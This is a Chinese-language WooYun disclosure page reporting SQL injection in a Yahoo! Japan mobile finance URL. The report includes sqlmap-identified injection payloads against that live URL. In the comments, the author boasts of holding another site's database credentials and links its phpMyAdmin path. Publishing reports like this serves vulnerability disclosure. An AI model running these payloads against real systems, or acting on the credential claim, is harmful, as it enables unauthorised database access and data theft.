Yahoo! Japan Website Multiple SQL Injection Vulnerabilities

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0176383

漏洞标题：Yahoo! Japan Website Multiple SQL Injection Vulnerabilities

漏洞作者：猪猪侠

提交时间：2016-02-17 13:24

修复时间：2016-02-22 13:30

公开时间：2016-02-22 13:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-02-17：细节已通知厂商并且等待厂商处理中
2016-02-22：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

Yahoo! Japan Website Multiple SQL Injection Vulnerabilities
Inlucde: boolean-based blind, stacked queries, AND/OR time-based blind

详细说明：

#1 Description
Vulnerable Website: http://m.finance.yahoo.co.jp
Injection URL: http://m.finance.yahoo.co.jp/stock/holder?code=2294
#2 Vulnerability
5 seconds after the web page is successfully opened

http://m.finance.yahoo.co.jp/stock/holder?code=2294; SELECT SLEEP(5)--

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: code (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: code=2294 AND 4884=4884
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries
    Payload: code=2294; SELECT SLEEP(5)-- 
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: code=2294 AND SLEEP(5)
---

漏洞证明：

#3 Exploit

http://m.finance.yahoo.co.jp/stock/holder?code=2294 and 1=1--

http://m.finance.yahoo.co.jp/stock/holder?code=2294 and 1=2--

result = requests.get(url).text
        if '962,000' in result:
            print _str

修复方案：

# before making any kind of request with them must be validated.

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-02-22 13:30

厂商回复：

漏洞Rank：15 (WooYun评价)

漏洞评价：

评价

2016-02-17 13:25 | sauren ( 实习白帽子 | Rank:88 漏洞数:27 | 天天打DOTA，快乐你我他~)

前排沙发，占个座
2016-02-17 13:25 | 云之凡 ( 实习白帽子 | Rank:48 漏洞数:23 | just do it)

又来
2016-02-17 13:26 | hkcs ( 实习白帽子 | Rank:55 漏洞数:8 | 只是路过)

0.0
2016-02-17 13:28 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:29 | 不会挖洞洞的猿猿不是好学生)

东京热啊猪哥。
2016-02-17 13:37 | 泳少 ( 普通白帽子 | Rank:233 漏洞数:81 | ★ 梦想这条路踏上了，跪着也要...)

JD hot
2016-02-17 13:41 | 风花雪月 ( 实习白帽子 | Rank:67 漏洞数:49 | []+[]|[]-[][][][][]%[][]|[]\[]%[][]|[]\[...)

坐看日本。
2016-02-17 13:42 | 猪猪侠 ( 核心白帽子 | Rank:3798 漏洞数:295 | 你都有那么多超级棒棒糖了，还要自由干吗？)

@金枪银矛小霸王没有VPN，打不开啊
2016-02-17 13:45 | 路人毛 ( 实习白帽子 | Rank:64 漏洞数:25 | ../)

jAPAN
2016-02-17 13:51 | 随风的风 ( 普通白帽子 | Rank:207 漏洞数:72 | 微信公众号：233sec 不定期分享各种漏洞思...)

东京热啊猪哥。
2016-02-17 13:56 | 陆由乙 ( 普通白帽子 | Rank:405 漏洞数:99 | 呵呵！)
2016-02-17 14:13 | 叫我阿米 ( 实习白帽子 | Rank:54 漏洞数:18 | 想好了，就去做，没想好，就去试错)

东京热吗？
2016-02-17 14:19 | 玄道 ( 路人 | Rank:22 漏洞数:13 | .-..-.-.-.-.-)

Tokyo hot。。。。
2016-02-17 14:33 | 葫芦岛小弱智 ( 路人 | Rank:19 漏洞数:4 | 葫芦岛小弱智)

麻烦帮我查一个番号，猪哥
2016-02-17 14:34 | Can ( 实习白帽子 | Rank:73 漏洞数:22 | 天地不仁以万物为刍狗)

@玄道黑客
2016-02-17 14:42 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:29 | 不会挖洞洞的猿猿不是好学生)

@猪猪侠我家打得开，你要教我日吗
2016-02-17 15:11 | 猪猪侠 ( 核心白帽子 | Rank:3798 漏洞数:295 | 你都有那么多超级棒棒糖了，还要自由干吗？)

@金枪银矛小霸王我有数据库用户和密码，但是不想把漏洞发出来http://tokyohot-xxx.com/dh_phpmyadmin/db01.tokyohot-xxx.com/
2016-02-17 15:41 | Mrlin ( 路人 | Rank:0 漏洞数:1 | 人人都忙于自己的欢喜与悲伤，有时候寂寞寂...)

实在没想到雅虎日本竟然存在sql注入漏洞嗯涨知识了
2016-02-17 16:58 | SH0X8001 ( 路人 | Rank:15 漏洞数:4 | 你猜)

查个番号
2016-02-17 17:00 | 小哲哥 ( 路人 | Rank:19 漏洞数:10 | 长得丑有什么好简介的)

东京热啊猪哥。
2016-02-17 17:31 | 坏男孩-A_A ( 路人 | Rank:28 漏洞数:11 | 膜拜学习中)

@猪猪侠 tokyohot??
2016-02-17 18:28 | Jumbo ( 普通白帽子 | Rank:115 漏洞数:30 | 猫 - http://www.chinabaiker.com)

我有数据库用户和密码，但是不想把漏洞发出来 http://tokyohot-xxx.com/dh_phpmyadmin/db01.tokyohot-xxx.com/
2016-02-17 19:08 | 金枪银矛小霸王 ( 普通白帽子 | Rank:141 漏洞数:29 | 不会挖洞洞的猿猿不是好学生)

@猪猪侠可以私聊给我。我查下番号:)
2016-02-17 19:15 | scanf ( 核心白帽子 | Rank:1380 漏洞数:199 | 。)

@猪猪侠 TOKYO GAS的广告一向感人猪哥去看看？
2016-02-17 19:36 | Mr.R ( 实习白帽子 | Rank:52 漏洞数:14 | 求大神带我飞 qq2584110147)

@猪猪侠猪哥撸遍国内向国外进发了国内已经没有人可以阻止他了
2016-02-17 19:41 | Fire ant ( 实习白帽子 | Rank:93 漏洞数:32 | 他们回来了................)

标题洋气的飞起
2016-02-17 21:04 | 来打我呀 ( 路人 | Rank:2 漏洞数:1 | 欢脱跳跃的小鲜肉~)

猪哥。。别听他们的，东京热什么的太污了。。。。。不如一本道怎么样？我有VPN
2016-02-18 10:30 | J′aron ( 路人 | Rank:17 漏洞数:5 | 问题真实存在但是影响不大.)

猪哥东京热啊！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0176383

漏洞标题：Yahoo! Japan Website Multiple SQL Injection Vulnerabilities

相关厂商：Yahoo! Japan

漏洞作者：猪猪侠

提交时间：2016-02-17 13:24

修复时间：2016-02-22 13:30

公开时间：2016-02-22 13:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0176383

漏洞标题：Yahoo! Japan Website Multiple SQL Injection Vulnerabilities

相关厂商：Yahoo! Japan

漏洞作者： 猪猪侠

提交时间：2016-02-17 13:24

修复时间：2016-02-22 13:30

公开时间：2016-02-22 13:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(日本国家互联网应急中心(JPCERT/CC))处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0176383"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云